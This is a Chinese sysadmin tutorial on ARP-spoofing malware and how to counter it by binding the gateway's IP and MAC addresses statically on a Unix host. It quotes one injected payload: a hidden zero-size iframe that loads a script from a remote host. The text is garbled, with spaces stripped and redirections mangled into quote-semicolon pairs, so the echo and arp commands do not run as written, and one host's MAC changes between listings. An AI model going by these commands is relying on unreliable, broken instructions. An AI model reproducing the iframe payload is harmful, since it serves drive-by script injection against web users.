一、ARP欺骗病毒,主要表现为:
中病毒的机器不仅影响自身,同时也会影响同网段的其它机器,将其它机器的HTTP数据包里加入病毒代码
。代码例子如:
iframeheight=“0“src=“http://xxx.eklajgl.com/lsj.js“width=“0“/iframe
这种病毒危害非常大!即使你机器的安全性做得很好,可是没办法保证同网段的其它机器安全没有问题!
解决办法:在网关和本机上双向绑定IP和MAC地址,以防止ARP欺骗。
二、绑定
1、网关上已经对下面所带的机器作了绑定。网关IP:192.168.0.1 MAC:00:02:03:18:08:00
2、要进行绑定的Unix主机IP:192.168.0.2 MAC:00:04:61:9D:8B:02
三、绑定步骤
1、先使用arp和arp-a查看一下当前ARP缓存列表
[root@ftp]#arp
AddressHWtypeHWaddressFlagsMaskIface
192.168.0.145ether00:13:20:E9:11:04Ceth0
192.168.0.1ether00:02:03:18:08:00Ceth0
说明:
Address:主机的IP地址
Hwtype:主机的硬件类型
Hwaddress:主机的硬件地址
FlagsMask:记录标志,C表示arp高速缓存中的条目,M表示静态的arp条目。
[root@ftp]#arp-a
(192.168.0.145)at00:13:20:E9:11:04[ether]oneth0
(192.168.0.1)at00:02:03:18:08:00[ether]oneth0
2、新建一个静态的mac--ip对应表文件:ip-mac,将要绑定的IP和MAC地下写入此文件,格式为ipmac
。
[root@ftp]#echo';192.168.0.100:02:03:18:08:00';/etc/ip-mac
[root@ftp]#more/etc/ip-mac
192.168.0.100:02:03:18:08:00
3、设置开机自动绑定
[root@ftp]#echo';arp-f/etc/ip-mac';/etc/rc.d/rc.local
4、手动执行一下绑定
[root@ftp]#arp-f/etc/ip-mac
5、确认绑定是否成功
[root@ftp]#arp
AddressHWtypeHWaddressFlagsMaskIface
192.168.0.145ether00:13:20:E9:11:04Ceth0
192.168.0.1ether00:02:03:18:08:00CMeth0
[root@ftp]#arp-a
(192.168.0.145)at00:02:B3:A7:85:48[ether]oneth0
(192.168.0.1)at00:02:03:18:08:00[ether]PERMoneth0
从绑定前后的ARP缓存列表中,可以看到网关(192.168.0.1)的记录标志已经改变,说明绑定成功。